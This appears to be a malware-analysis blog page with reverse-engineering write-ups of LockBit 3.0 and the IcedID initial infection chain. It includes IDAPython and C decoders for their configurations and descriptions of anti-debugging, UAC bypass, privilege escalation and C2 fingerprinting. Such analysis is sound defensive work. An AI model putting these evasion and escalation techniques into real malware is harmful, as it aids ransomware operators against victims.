    inverted = ~dword & 0xFFFFFFFF  # Invert and mask to 32 bits
    return inverted
    

def decode_string(stack_string_encoded):

    xor_key = bytearray.fromhex("10035FFF")
    
    try:
        encoded_string = bytearray.fromhex(stack_string_encoded.replace("0x",""))
    except ValueError:
        # Some cases the encoded string will be 4 bytes, but the last byte will only contain one value
        # In this case we add the trailing 0 that IDA omits
        encoded_string = bytearray.fromhex(stack_string_encoded.replace("0x","") + "0")
    
    decoded_string = xor_bytearrays(encoded_string, xor_key)
    decoded_string = invert_bytearrays(decoded_string)
    decoded_string = flip_bytearray(decoded_string)
    return decoded_string

def get_stack_decode_parameters(stack_decode_function_ea):

    '''
    We always pass two paramters to DecodeStackString, this means
    if we go back 0xA bytes we will hit the DWORD array containing stack strings.
    
    Going back 0x3 and taking the 1'th element will give us the size of the stack array.
    
    .text:00416E1C C7 40 08 6C A0 FC EF                    mov     dword ptr [eax+8], 0EFFCA06Ch
    .text:00416E23 6A 03                                   push    3
    .text:00416E25 50                                      push    eax
    .text:00416E26 E8 15 A4 FE FF                          call    DecodeStackString
    '''

    stack_string_array = stack_decode_func - 0xA
    stack_string_array_size = idc.get_bytes(stack_decode_func - 0x3, 0x2, 0)[1]
    
    return (stack_string_array, stack_string_array_size)

def get_list_encoded_string_values(stack_string_array_ea, stack_string_array_size):
    
    # Save inital value
    stack_string_array_inital_ea = stack_string_array_ea
    stack_string_array_inital_ea_next = idc.next_head(stack_string_array_inital_ea, 0xFFFFFFFFFFFFFFFF)
    
    # Move the stack string array ea to before it starts for the loop
    stack_string_array_ea = idc.next_head(stack_string_array_ea, 0xFFFFFFFFFFFFFFFF)
    
    decoded_string_buffer = bytearray(0)
    
    for i in range(0, stack_string_array_size):
        
        # Set the stack string array ea to next stack string
        stack_string_array_ea = idc.prev_head(stack_string_array_ea, 0)
        if print_insn_mnem(stack_string_array_ea) != "mov":
            continue
        
        # Extract the stack string from the assembly line
        # Example: mov dword ptr [eax+4], 0EF9BA02Dh
        stack_string_encoded = get_operand_value(stack_string_array_ea, 1) 
        stack_string_encoded = hex(stack_string_encoded & 0x00000000FFFFFFFF)
        decoded_string = decode_string(stack_string_encoded)
        decoded_string_buffer = decoded_string + decoded_string_buffer

    print("[+] Decoded Bytes: " + decoded_string_buffer.hex())
    try:
        print("[+] Decoded String: " + decoded_string_buffer.decode('utf-16'))
        
        idc.set_cmt(stack_string_array_inital_ea, decoded_string_buffer.decode('utf-16'), 0);
        idc.set_cmt(stack_string_array_inital_ea_next, decoded_string_buffer.hex(), 0);
    except UnicodeDecodeError:
        idc.set_cmt(stack_string_array_inital_ea_next, decoded_string_buffer.hex(), 0);
    
for xref in idautils.XrefsTo(stack_decoding_string_function_ea):
    print(f"[*] Decode Function @ {hex(xref.frm)}")
    stack_decode_func = xref.frm
    (stack_string_array, stack_string_array_size) = get_stack_decode_parameters(stack_decode_func)

    get_list_encoded_string_values(stack_string_array,stack_string_array_size)

Majority of the decoded stack strings will resolve to data that can be interpreted as Unicode strings.

However, there is data that is not human readable encoded using this mechanism. For example, the following is the riid parameter for the CoCreateInstance function.

Anti-Debugging

Heap Corruption

A wrapper function is used to invoke RtlAllocateHeap, before the call to this function the handle to the heap is acquired via the PEB and the Heap->ForceFlags is checked for a value other than 0 indicating the presence of a debugger.

If the presence of a debugger found the pointer to the heap is corrupted and RtlAllocateHeap will likely crash the process as a result.

Heap Based Anti-Debug Technique — RtlCreateHea

There are a lot of anti debug techniques. Some of them are basics and some of them are advanced. Now, I explain a little bit hard one…

MediumBilal Bakartepe

『Lockbit 3.0で見つけたアンチデバッグテクニック（その１）』

はじめに（読み飛ばし推奨） 2022年に利用がみられているランサムウェアのLockbit 3.0を解析中です。Lockbit 3.0は、ビルダーが流出した話が…

AmebaSachiel

Detaching from Debugger

ZwSetInformationThread is use with the ThreadHideFromDebugger parameter when the process begins running, and on newly spawned encryption threads. This results in "enables suppression of debug events generated on the thread. Threads that do not generate debug events are essentially invisible to debuggers."

Detaching from Debugger

Preventing Debugger from Attaching

During the beginning DbgUiRemoteBreakin is corrupted by setting the first few bytes of the function to Read/Write, and using SystemFunction040 to encrypt the contents. As a result a debugger will not be able to attach itself to the process.

Corruption of DbgUiRemoteBreakin

Lockbit Configuration Decryption

One of the first steps taken by Lockbit is to decode its embedded configuration file.

Helper Function Decoding

There are multiple steps taken by Lockbit to decode the embedded configuration file. The first phase is to extract helper functions that are encrypted and compressed within the .data section. These helper functions take the form of Assembly instructions that will facilitate the generation of XOR keys used to decrypt the configuration.

Note, that the size of the helper function buffer is stored in the DWORD right before it starts, in this case it is 0x1AE bytes in size.

Encrypted and Compressed Helper Functions

In order to decrypt the helper function buffer each byte is XOR'd with a hardcoded key of 0x30. After the entire buffer is decrypted APLib is used to decompress the contents.

The most important steps is the fact that the helper function buffer has been decrypted and decompressed into a newly allocated buffer on the heap. Since the contents of the this buffer are executable assembly code Lockbit will be able to successfully execute when invoked.

In the end, a trampoline function is created in order to invoke the assembly code. This is the exact same process as used for functions resolved via API hashing.

Decoding Helper Function and Trampoline Function Construction

The helper function that has been decoded in this phase will be used in the process of decoding the core configuration.

The following script was used in IDA in order to decrypt and decompress the helper functions. A new segment was created in IDA in order to write the assembly code to.

import struct
from binascii import crc32
from io import BytesIO
import idc
import idautils

# APLib Code Found on https://github.com/snemes/aplib
class APLib(object):

    __slots__ = 'source', 'destination', 'tag', 'bitcount', 'strict'

    def __init__(self, source, strict=True):
        self.source = BytesIO(source)
        self.destination = bytearray()
        self.tag = 0
        self.bitcount = 0
        self.strict = bool(strict)

    def getbit(self):
        # check if tag is empty
        self.bitcount -= 1
        if self.bitcount < 0:
            # load next tag
            self.tag = ord(self.source.read(1))
            self.bitcount = 7

        # shift bit out of tag
        bit = self.tag >> 7 & 1
        self.tag <<= 1

        return bit

    def getgamma(self):
        result = 1

        # input gamma2-encoded bits
        while True:
            result = (result << 1) + self.getbit()
            if not self.getbit():
                break

        return result

    def depack(self):
        r0 = -1
        lwm = 0
        done = False

        try:

            # first byte verbatim
            self.destination += self.source.read(1)

            # main decompression loop
            while not done:
                if self.getbit():
                    if self.getbit():
                        if self.getbit():
                            offs = 0
                            for _ in range(4):
                                offs = (offs << 1) + self.getbit()

                            if offs:
                                self.destination.append(self.destination[-offs])
                            else:
                                self.destination.append(0)

                            lwm = 0
                        else:
                            offs = ord(self.source.read(1))
                            length = 2 + (offs & 1)
                            offs >>= 1

                            if offs:
                                for _ in range(length):
                                    self.destination.append(self.destination[-offs])
                            else:
                                done = True

                            r0 = offs
                            lwm = 1
                    else:
                        offs = self.getgamma()

                        if lwm == 0 and offs == 2:
                            offs = r0
                            length = self.getgamma()

                            for _ in range(length):
                                self.destination.append(self.destination[-offs])
                        else:
                            if lwm == 0:
                                offs -= 3
                            else:
                                offs -= 2

                            offs <<= 8
                            offs += ord(self.source.read(1))
                            length = self.getgamma()

                            if offs >= 32000:
                                length += 1
                            if offs >= 1280:
                                length += 1
                            if offs < 128:
                                length += 2

                            for _ in range(length):
                                self.destination.append(self.destination[-offs])

                            r0 = offs

                        lwm = 1
                else:
                    self.destination += self.source.read(1)
                    lwm = 0

        except (TypeError, IndexError):
            if self.strict:
                raise RuntimeError('aPLib decompression error')

        return bytes(self.destination)

    def pack(self):
        raise NotImplementedError


# APLib Code Found on https://github.com/snemes/aplib
def decompress(data, strict=False):
    packed_size = None
    packed_crc = None
    orig_size = None
    orig_crc = None

    if data.startswith(b'AP32') and len(data) >= 24:
        # data has an aPLib header
        header_size, packed_size, packed_crc, orig_size, orig_crc = struct.unpack_from('=IIIII', data, 4)
        data = data[header_size : header_size + packed_size]

    if strict:
        if packed_size is not None and packed_size != len(data):
            raise RuntimeError('Packed data size is incorrect')
        if packed_crc is not None and packed_crc != crc32(data):
            raise RuntimeError('Packed data checksum is incorrect')

    result = APLib(data, strict=strict).depack()

    if strict:
        if orig_size is not None and orig_size != len(result):
            raise RuntimeError('Unpacked data size is incorrect')
        if orig_crc is not None and orig_crc != crc32(result):
            raise RuntimeError('Unpacked data checksum is incorrect')

    return result


original_config_offset = 0x00F04DBF # Offset to the encrypted and compressed helper functions
current_config_offset = original_config_offset

size = idc.get_wide_dword(original_config_offset - 4,)
print(hex(size))

# Decrypt Helper Functions with XOR

for byte in range(0,size):
    current_byte = idc.get_bytes(current_config_offset, 1)
    current_byte = int.from_bytes(current_byte)
    current_byte = current_byte ^ 0x30
    
    idc.patch_byte(current_config_offset, current_byte)
    
    current_config_offset = current_config_offset + 1

# Decompress Helper Functions and Write to New Segment

decoded_bytes = idc.get_bytes(original_config_offset, size)
decompressed_bytes = decompress(decoded_bytes)
new_segment = 0x0F190000 # New Segemnt to write code to, this will store decrypted and decompressed assembly code

for index, byte in enumerate(decompressed_bytes):
    idc.patch_byte(new_segment + index, byte)

IDAPython Script to Decode Helper Functions

Configuration Decoding

The configuration is stored in the .pdata section, the following summarizes the components of the configuration:

.pdata+0x0: First DWORD used to generate initial XOR key.
.pdata+0x4: Second DWORD used to generate initial XOR key.
.pdata+0x8: Size of configuration contents.
.pdata+0xC: Encrypted and compressed configuration contents.

Core Lockbit Configuration in .pdata

The DeriveXORKey function in this case is a call to the helper function that has been decoded in the previous step. Once called, it will return a value in eax and edx that will be utilized to decrypt the configuration. Note, the DeriveXORKey function depends on the first two 8 bytes of the configuration, as a result we can produce a deterministic value each time for the configuration.

The core of the decryption process is the derivation of XOR keys within the DeriveXORKey function. Once DeriveXORKey derives a key it is returned within as two separate values, in this case within the EAX and EDX registers.

Derive XOR Values for Config Decryption

As a reminder, the DeriveXORKey is the helper function that was decrypted in the prior step. Without the prior step there would be no way to generate the XOR keys required to decrypt the core configuration.

DeriveXORKey Trampoline Jump

The Lockbit configuration is then decrypted by two DWORDs at a time using both of these XOR keys. Each DWORD is XOR'd with a specific byte within the DWORD.

This decryption scheme ensures that each byte is encrypted with a separate XOR key. In addition, it adds a level of complexity for the analyst to be able to determine the final algorithm and reimplement it.

To provide the best clarity behind the algorithm used for decryption reference the following code written in C which emulates the process:

#include 
#include 
#include 
#include "LockbitConfig.h"
#include "aplib.h"


DWORD32 MultiplyAndGetHigh(DWORD32 a, DWORD32 b) {
    // Perform the multiplication, which results in a 64-bit result
    DWORD64 result = (DWORD64)a * (DWORD64)b;

    // Extract the higher 32 bits by shifting right
    return (DWORD32)((result >> 32) & 0xFFFFFFFF); // Right shift by 32 bits
}

VOID ComputeNumbers(_In_ DWORD32 Arg1, _In_ DWORD32 Arg2, _In_ DWORD32 Arg3, _In_ DWORD32 Arg4, _Out_ PDWORD32 XORKey1, _Out_ PDWORD32 XORKey2) {

    *XORKey1 = Arg1 * Arg3;
    *XORKey2 = MultiplyAndGetHigh(Arg1, Arg3) + ((Arg3 * Arg2) + (Arg1 * Arg4));
}

// Value1 will first be pointer to first dword of config
// Value2 will first be pointer to second dword of config
void DeriveXORKey(_In_ PDWORD32 InputValue1, _In_ PDWORD32 InputValue2, _Out_ PDWORD32 XORKey1, _Out_ PDWORD32 XORKey2) {

    /*
        Compute the first round of XOR Keys
    */

    DWORD Output1 = 0;
    DWORD Output2 = 0;
    ComputeNumbers(*InputValue1, *InputValue2, 0x4C957F2D, 0x5851F42D, &Output1, &Output2);

    /*
        Conduct permutations on the first round of XOR keys
    */

    DWORD32 permutedArg3 = Output1 + 0x0F767814F;
    DWORD32 carry = 0;
    if (permutedArg3 < Output1 || permutedArg3 < 0x0F767814F) {
        carry = 1;
    }

    // If previous add had carry flag set, add it to this calculation
    DWORD32 permutedArg4 = Output2 + 0x14057B7E + carry;

    /*
        Updated values used for follow up DeriveXORKey calls
    */

    *InputValue1 = permutedArg3;
    *InputValue2 = permutedArg4;

    /*
        Compute second round of XOR keys and return
    */

    ComputeNumbers(((PDWORD)global_LockbitConfig)[0], ((PDWORD)global_LockbitConfig)[1], permutedArg3, permutedArg4, &Output1, &Output2);

    *XORKey1 = Output1;
    *XORKey2 = Output2;
}

VOID DecodePayload(PBYTE pConfig, SIZE_T size) {


    /*
      These two values are initally set to the first and second DWORD from the Lockbit Conifg

      After each DeriveXORKey execution they get updated with a permuted value, and are
      passed to the following DeriveXORKey call.
  */

    DWORD32 value1 = ((PDWORD)global_LockbitConfig)[0];
    DWORD32 value2 = ((PDWORD)global_LockbitConfig)[1];

    /*
        The xorKey DWORD variables will receive XOR Keys from DeriveXORKey.
    */
    DWORD32 xorKey1 = 0;
    DWORD32 xorKey2 = 0;

    SIZE_T DwordsToDecrypt = 2;

    PBYTE pCurrentConfigOffset = pConfig;
    SIZE_T configSizeCounter = size;

    /*
        Decode the config, the lower 16 bits will be used to decode one DWORD of the config.
        Then the higher 16 bits will be used to decode another DWORD of the config.

    */

    while (TRUE) {

        DeriveXORKey(&value1, &value2, &xorKey1, &xorKey2);

        for (SIZE_T j = 0; j < 2; j++) {

            // XOR with LOWER_8_BITS(xorKey1) - AL of EAX

            *pCurrentConfigOffset = *pCurrentConfigOffset ^ (xorKey1 & 0x000000FF);
            pCurrentConfigOffset++;

            configSizeCounter--;
            if (configSizeCounter == 0) {
                goto END;
            }

            // XOR with HIGHER_8_BITS(xorKey2) - DH of EDX

            *pCurrentConfigOffset = *pCurrentConfigOffset ^ ((xorKey2 >> 8) & 0x000000FF);
            pCurrentConfigOffset++;

            configSizeCounter--;
            if (configSizeCounter == 0) {
                goto END;
            }

            // XOR with HIGHER_8_BITS(xorKey1) - AH of EAX

            *pCurrentConfigOffset = *pCurrentConfigOffset ^ ((xorKey1 >> 8) & 0x000000FF);
            pCurrentConfigOffset++;

            configSizeCounter--;
            if (configSizeCounter == 0) {
                goto END;
            }

            // XOR with LOWER_8_BITS(xorKey2) - DL of EAX

            *pCurrentConfigOffset = *pCurrentConfigOffset ^ (xorKey2 & 0x000000FF);
            pCurrentConfigOffset++;

            configSizeCounter--;
            if (configSizeCounter == 0) {
                goto END;
            }

            // Shift bits right by 0x10
            // This ensures we now use the higher 16 bits for the next loop around
            xorKey1 = xorKey1 >> 0x10;
            xorKey2 = xorKey2 >> 0x10;
        }
    }
END:
    return;
}


int main()
{
    
    /*
        Allocate new heap space for the decoded config
    */

    SIZE_T configSize = ((PDWORD)global_LockbitConfig)[2];

    PBYTE pLockbitConfig = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, configSize);
    if (pLockbitConfig == NULL) {
        return -1;
    }

    memcpy(pLockbitConfig, global_LockbitConfig + 0xC, configSize); // Encoded config starts at global_LockbitConfig + 0xC

    /*
        Decrypt the config
    */

    DecodePayload(pLockbitConfig, configSize);

    /*
        Decompress Config with APLib
    */

    PBYTE pDecompressedConfig = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, configSize * 4);
    if (pDecompressedConfig == NULL) {
        return -1;
    }

    aP_depack_asm(pLockbitConfig, pDecompressedConfig);
    
    return 0;

}

C Implementation of Lockbit 3.0 Configuration Decoding

Configuration Parsing

Once the configuration is decrypted and decompressed various parts of the buffer are interpreted and associated with its corresponding data that is stored.

Decrypted Lockbit Configuration

Red: 1024-bit RSA Key
Orange: UID and KeyID
Purple: Boolean values indicating to enable or disable functionality
Green: Base64 encoded configurations separated by NULL terminators.

The following summarizes what is included within the Base64 encoded configuration sections:

Folder Exclusion List: List of folders to be excluded stored as a string hash.

Filename Exclusion List: List of filenames to be excluded stored as a string hash.

File Extension Exclusion List: File extensions to be exclude stored as a string hash.

Computer Hostname Exclusion List: Computer hostnames to exclude stored in plaintext.

Process Termination List: List of process names to terminate stored in plaintext.

Service Termination List: List of services to terminate stored in plaintext.

User Account Impersonation List: List of accounts used to run the ransomware under.

Ransom Note: The ransom note.

Pre-Encryption Checks and Anti-Forensics

Language Check

Language checks are conducted if the LanguageCheck flag in the configuration is enabled, it is conducted with the NtQueryDefaultUILanage function.

Language Check

A full list of languages checked are below:

Language
Russian
Ukrainian
Belarusian
Tajik
Armenian
Azerbaijani
Georgian
Kazakh
Kyrgyz
Turkmen
Uzbek
Tatar

Process Deletion

During execution Lockbit will start a function as a thread responsible for terminating blacklisted processes.

Process Termination Capability

This function will utilize NtQuerySystemInformation to enumerate each process and compare to a predefined list of processes, if there are any matches a handle will be opened to the process and it will be terminated.

Process Terminitation Logic

Service Deletion

If the terminate service flag is set, Lockbit will terminate a predefined list of services. First it will construct a list of services that are present on the system via EnumServicesStatusExW.

Service Enumeration

After, it will loop through each service and compare to a predefined list. If there is a match that service will be stopped and deleted. [ CONFIRM]

Service Termination

Clearing Event Logs

Event Log Clearning Capability

Clear Event Log Logic

Creating a Mutex

A Mutex name will be generated based on the RSA key embedded in the Lockbit configuration.

Mutex Creation

The mutex name will take the form of Global%.8x%.8x%.8x%.8x. after hashing the RSA key with MD5, performing mutations on the result, and then hashing it with MD4.

Privilege Escalation

Impersonate as Other User

Within the Lockbit configuration multiple user accounts in the form of username and passwords can be stored. These credentials can be passed to LogonUserW in order to retrieve a token representing the user.

LogonUserW Wrapper Function

Once the token of a user is retrieved it is stored in a global variable that is used at a later point in time.

Passing User Information to LogonUserW

Checking Administrator Rights

UAC Bypass

If the current process is not running as administrator, and the current Windows version is Vita or above a UAC bypass that uses the CMSTPLUA COM interface will be used, as also mentioned by this Google blog post.

UAC Bypass Check

Process Privilege Enable

In the .text section there is a array of LUID's representing various privileges.

Privilege Array

Lockbit will loop through this table and enable each privileges in the process via RtlAdjustPrivilege.

Loop to Enable Privileges

References

References used to learn and assist with my analysis:

LockBit Ransomware v2.0

Malware Analysis Report - LockBit Ransomware v2.0

Chuong DongChuong Dong

Dissecting LockBit v3 ransomware

We analyzed a variant of LockBit v3 ransomware, and rediscovered a bug that allows us to decrypt some data without paying the ransom. We also found a design flaw that may cause permanent data loss.

CalifNhân Huỳnh

[12월 Security Report] LockBit 3.0 랜섬웨어

PDF : https://www.somansa.com/security-report/security-note/lockbit30_202212/ 요약 1. 서비스형 랜…

네이버 블로그 | 소만사, 소프트웨어를 만드는 사람들소만사

LockBit 3.0 - An In-Depth Analysis Of LockBit Black’s Config

An In-Depth Analysis Of LockBit Black's Config

Shining a Light on DARKSIDE Ransomware Operations | Google Cloud Blog

The creators of DARKSIDE ransomware have launched a global crime spree affecting organizations in more than 15 countries and multiple industry verticals.

Google Cloud

IcedID Initial Attack Chain Analysis

Aleks — Mon, 29 May 2023 22:52:31 GMT

Introduction

The post will focus on the initial attack chain IcedID uses to execute its main payload. IcedID has multiple components, starting from an ISO file, before it begins executing its core module.

Specifically, the article will be divided into the following sections:

Initial Execution: Walkthrough of initial execution of IcedID.
First Stage Execution: Unpacking routine of IcedID first stage.
First Stage Execution: Core execution of IcedID first stage.
Second Stage Payload Downloading: Download and execution of second stage.
Execution of Core Module: Execution of Core IcedID Module

The sample used for analysis was retrieved from a Malware Traffic Analysis post. Specifically, the initial ISO file used during this infection has the hash of E2963BA47D2E07A98EAFBD2EF56FFC6AE0E0C483E5E8E1FB1F24F8516ABD246A.

Initial Execution

The initial execution of the IcedID sample begins with an ISO file that is mounted by a user.

IcedID ISO File

Inside the mounted ISO file the user is presented with a LNK and a hidden folder.

Contents of IcedID ISO File

The hidden folder contains more files, including the IcedID payload and other files that facilitate its execution.

Contents of Sub Folder in IcedID ISO File

When the document.lnk is clicked it will invoke a JS file formingGuying.js in the scabs folder.

LNK Execution Path

When the formingGuying.js file is invoked by the document.lnk, it will in turn call a Batch script and pass a paramter to it.

Javascript Executed by LNK File

The Batch Script will invoke the packed IcedID first stage that exists in the form of a DLL file. The rundll command is not hardcoded in this batch script, a portion of it is passed as a parameter. As can be seen only the ll is present in the command and the rest is included from the paramter passed to the Batch script.

Batch Script Executed by Javascript File

The z.txt packaged in the ISO is not used and appears to contain random text. This may be an attempt to decrease the entropy created from the packed DLL file.

Benign File with Text

The roars.jpg also appears to be benign and unused during the process. This may also be an attempt to reduce entropy.

Benign Image File

The following acts as a diagram to summarize the initial execution chain:

Inital Access Diagram

First Stage Execution - Unpacking

The first stage IcedID payload takes the form of a DLL with an extremally large .data section. This is the result of the true first stage being packed and hidden within the .data section.

Large .data Section in IcedID First Stage

The packed DLL contains multiple exports, however, only the export with the ordinal of 1 will be used since that is what is invoked by the Batch script in the ISO file.

Exports from Packed IcedID First Stage DLL

Shellcode Decoding

During the execution of the packed IcedID first stage DLL encoded shellcode is placed into a memory buffer allocated with VirtualAlloc with Read, Write, and Execute permissions.

Packed IcedID DLL Allocates RWX Memory Space

In the packed first stage DLL, the shellcode is stored in an encoded format. Decoding is done through a simple XOR loop with the key 0x1B.

Decode Unpacking Shellcode via an XOR Loop

After the shellcode is copied into memory and decoded, a call is used to enter the buffer with the shellcode.

Begin Execution Decoding Shellcode

Inside the shellcode the first stage loader from the .d section will be decoded and mapped into memory. Following this the shellcode will transfer control to the entrypoint of the first stage loader.

Execution of Unpacked IcedID First Stage

At this point the IcedID sample has been unpacked and reveals a new executable.

Unpacked IcedID First Stage Section Layout

First Stage Execution - Main Logic Execution

Config Decryption

The IcedID first stage stores its configuration in a PE data section, in this case it is in the last section named .d. The total length of the configuration is 0x80 bytes, with the first 0x40 being the configuration and the later 0x40 being the XOR key to decode it.

IcedID Configuration and XOR Key from .d Section

The decoding routine will loop through each byte, and use the value 0x40 bytes ahead of the current byte as the XOR key value. The following is a script that will decode the configuration file:

```python
import pefile
import binascii

file_name = "sample.bin"
section_config_name = ".d"

def byte_xor(ba1, ba2):
    return bytes([_a ^ _b for _a, _b in zip(ba1, ba2)])

def decode_config(config_data):

    # The sample has a hardcoded size of 0x80, 0x40 for the config and 0x40 for the XOR key
    encoded_config_raw = config_data[0:0x40] 
    xor_key_raw = config_data[0x40:0x80]
    encoded_config = binascii.hexlify(config_data[0:0x40])
    xor_key = binascii.hexlify(config_data[0x40:0x80])

    print("Encoded Config: ", encoded_config.decode())
    print("XOR Key Stream: ", xor_key.decode())

    decoded_config = byte_xor(bytes(list(encoded_config_raw)), bytes(list(xor_key_raw)))
    return decoded_config

def config_extract(filename):
    pe = pefile.PE(filename)
    for pe_section in pe.sections:
        if pe_section.Name.decode("utf-8").strip("\x00") == section_config_name:
            print("[+] Found Section: " + pe_section.Name.decode("utf-8").strip("\x00"))

            # Get raw decoded config
            raw_config = decode_config(pe_section.get_data())

            # Print campaign ID (Reverse the bytes to make it big endian)
            raw_id = binascii.hexlify(raw_config[0:4])
            reverse_id = []

            for index in range(0,len(raw_id),2):
                reverse_id.append(raw_id[index:index+2])

            reverse_id.reverse()
            print("Campaign ID: ", int(b''.join(reverse_id), 16))

            # Print C2 Domain
            print("C2 Domain: ", end='')
            for i in range(0,len(raw_config[4:-1])):
                current_char = chr(raw_config[i+4])
                print(current_char, end='')

                if current_char == chr(0):
                    break
            print()

config_extract(file_name) # Tested with unpacked sample 406e5f1b61eb7dda498b525c8af5d8f8611a3c41ff2cdeafbc37081bdd375da7
```

IcedID Configuration Decoder

The following is a demonstration of the configuration decoder executing.

IcedID Configuration File Decoded

Information Collection

When the IcedID loader initially reaches out to the command and control server it will collect information about the system and embed it into a HTTP request as multiple cookie values. In the following screenshot six cookie values have been observed:

Information About System Sent to IcedID C2 Server

This section will cover all the cookie values and the information that is embedded in each of them.

Host and Campaign Information - __gads

The __gads cookie value will contain information about the host and IcedID campaign that was extracted from the embedded configuration. All the stored information is separated by a : character.

Host and Campaign Information

[FIRST]: Campaign tracking value from the configuration.
[SECOND]: Hardcoded “1” value – A possible version number for the software.
[THIRD]: System Uptime in Seconds (Retrieved via GetTickCount).
[FOURTH] : Number of Running Processes On System.

Windows Version Information - _gat

The _gat cookie value will store the major and minor version of the Windows operating system.

Windows Version Information

[FIRST]: Value from RTL_OSVERSIONINFOW.dwMajorVersion.
[SECOND]: Value from OSVERSIONINFOW.dwMinorVersion.

User and Computer Name Information - _u

The _u cookie value will store information about the username and hostname of the computer, along with a anti-sandbox value that is likely to be checked by the server.

User and Computer Name Information

[FIRST]: Computer NetBIOS name represented in ASCII in hex.
[SECOND]: Current username IcedID is running under in ASCII represented in hex.
[THIRD]: Anti-sandbox value generated from RDTSC operations.

SID Information - __io

The __io cookie value will hold a portion of the SID of the current running user. The cookie value will look like the following:

SID Information

This value was retrieved from the following SID value:

SID Account of Current User

Processor Information - _ga

The _ga cookie will hold information about the processor, along with a anti-sandbox value.

Processor Information

[FIRST]: This value can be considered to have three bits, with each bit indicating a specific result from CPUID. These values will all be OR'd with each other to form the final decimal number.
- Bit 0: If set, CPUID.0.EBX contains “Genu”.
- Bit 1: If set, execute disable bit is available as checked in CPUID.800000001.RDX[20]
- Bit 2: If set, digital temperature sensor is supported as checked in CPUD.6.RAX[0]

[SECOND]: DWORD value from CPUID.1.EAX.
[THIRD]: Anti-sandbox value calculated from a combination of RDTSC loops that run CPUID.

[FOURTH]: Hypervisor detection value. Uses CPUID.40000000.EBX to determine the hypervisor model used.
- A zero value will indicate a physical host, and a non-zero value will indicate a hypervisor.
- In this case, '1238' refers to the ASCII bytes 'MV' from the 'VMwa' output of CPUID.40000000.EBX.

MAC Address Information - _gid

The _gid will hold a list of MAC Addresses from the host, each encoded and separated with a : character.

The cookie value will appear as follows:

MAC Address Information

The highlighted MAC Address 00685951A0C2 is actually the encoded MAC Address 00-0C-29-27-10-53.

MAC Address of Each Interface

The encoding algorithm will take the original MAC address and shift the bytes around in order to create the encoded version, to decode the same operation is performed in opposite.

The following code acts as a proof of concept encoding algorithm used:

#include 
#include 
#include 

void PrintVector(std::vector targetVector) {
    for (auto value : targetVector) {
        printf("%02X ", value);
    }
}

int main()
{

    std::vector macAddress{ 0x00, 0x0C, 0x29, 0x27, 0x10, 0x53 }; // MAC Address to Encode
    std::vector encodedMacAddress;

    // Encode MAC Address
    for (size_t i = 0; i < macAddress.size(); i++) {

        // Main encoding logic here
        BYTE encodedMacAddressByte = macAddress[i] + i;
        __asm {rol encodedMacAddressByte, 3};

        encodedMacAddress.push_back(encodedMacAddressByte);
    }

    // Print original MAC Address
    printf("Original MAC Address:\t");
    PrintVector(macAddress);
    printf("\n");

    // Print encoded MAC Address
    printf("Encoded MAC Address:\t");
    PrintVector(encodedMa
cAddress);
    printf("\n");
}

Mac Address Encoding

The following demonstrates the output of the example program:

Mac Address Encoding Running

Second Stage Payload Downloading

The first stage will download the second stage payload through HTTP in the GZIP format. The data downloaded is not actually in a GZIP format, this is just a field added to the HTTP request. In reality the second stage is XOR encoded and will need to be decoded.

IcedID C2 Emulation

During the analysis of this sample the original download server was already offline, this means to facilitate dynamic analysis a webserver was setup to emulate the IcedID second stage downloading.

The following Github repository contains the Golang program used to serve the second stage.

Second Stage Download via HTTP

Once the second stage payload is downloaded successfully it is decoded in memory. If the download fails the program will sleep and retry.

Second Stage Decode Loop

After the download of the second stage the first two bytes will be checked for match 0x1F8B.

First Two Bytes of Second Stage

Once the second stage is decoded it contains the following data at the associated offsets:

Second Stage Offsets
- 0x2: DWORD that indicates the size of license.dat
- 0x6: DWORD that indicates the size of vote32.tmp
- 0xA: Name of Folder in AppData (SignDinner) 0x2A - Name of IcedID core payload on disk (license.dat)
- 0xC9 - Name of the Core Module Loader (vote32.tmp)
- 0x2C6: Beginning of encoded licence.dat
- 0x2C6 + size of licence.dat: vote32.tmp file

Both the licence.dat file and vote32.tmp file will be written to disk before starting the routine to decode the core module and execute it.

Write Licence.dat and Vote.tmp to Disk, before decoding and running core module

For visualization purposes the following screenshot is the beginning of the decoded second stage. The highlighted text reveals null terminated strings of the licence.dat file name, the SingDinner folder name where licence.dat will be written to, and the vote32.tmp file name. The authors of IcedID can easily change any of these names, however, the licence.dat is usually unchanged based on public reporting and other samples published online.

Beginning of the Decoded IcedID Second Stage

Licence.dat

The licence.dat file is arguably the most important file of the attack chain, this file contains the final IcedID core module that will be executed. The file itself is stored as a PE file with a customized PE header. The customizations include stripping the PE header and section headers and storing the fields in a non-standard format.

Due to the fact the core module is stored with a customized format it cannot be executed through Windows natively. During the beginning the core module is loaded and executed via the first stage, however, later the licence.dat is passed to a dedicated loader run via a scheduled task.

The licence.dat file is always present in an encoded stage and must be decoded using XOR before usage.

The key for the decoding of this file are stored in the last 16 bytes of the file, 4 DWORDs act as the key to the XOR decoding stream. Furthermore, every time a byte is XOR'd two DWORDs from the key will be rolled right.

The following is an example of the 16 byte key (4 DWORDs) that are used as the key in the sample analyzed in this post:

4 DWORD Bytes that act as an XOR Key

The following is a decoding function that will parse the XOR key and decode each byte of the licence.dat file. Note, we loop over sizeOfSectionStage - 0x10 bytes of the file, since the last 16 bytes (0x10 bytes) is the key. We do not want to XOR the bytes we are using as a key stream.

int DecodeRoutine(PBYTE pSecondStage, DWORD sizeOfSecondStage) {

    DWORD sizeOfSecondStageMinusXORBytes = sizeOfSecondStage - 0x10;
    PDWORD pXORBytes = (PDWORD) ((PBYTE)pSecondStage + sizeOfSecondStageMinusXORBytes);

    for (DWORD i = 0; i < sizeOfSecondStageMinusXORBytes; i++) {

        DWORD xorBytesIndex1 = i % 3;
        DWORD xorBytesIndex2 = (i + 1) % 3;

        // Construct an XOR byte based on xorBytesIndex1 and xorBytesIndex2 
        BYTE xorByte = *((PBYTE)&pXORBytes[xorBytesIndex1]) + *((PBYTE)&pXORBytes[xorBytesIndex2]);

        // XOR the licence.dat buffer wit the XOR byte
        pSecondStage[i] = pSecondStage[i] ^ xorByte;

        // Rolling the DWORD that
        BYTE rollNumber = *((PBYTE)&pXORBytes[xorBytesIndex2]) & 0x7;
        DWORD bytesToRoll = pXORBytes[xorBytesIndex1];

        __asm {
            push ecx
            push ebx

            mov cl, rollNumber
            mov ebx, bytesToRoll

            ror ebx, cl
            mov bytesToRoll, ebx


            pop ecx
            pop ebx
        }

        pXORBytes[xorBytesIndex1] = ++bytesToRoll;

        // Rolling the DWORD that xorBytesIndex2 points to
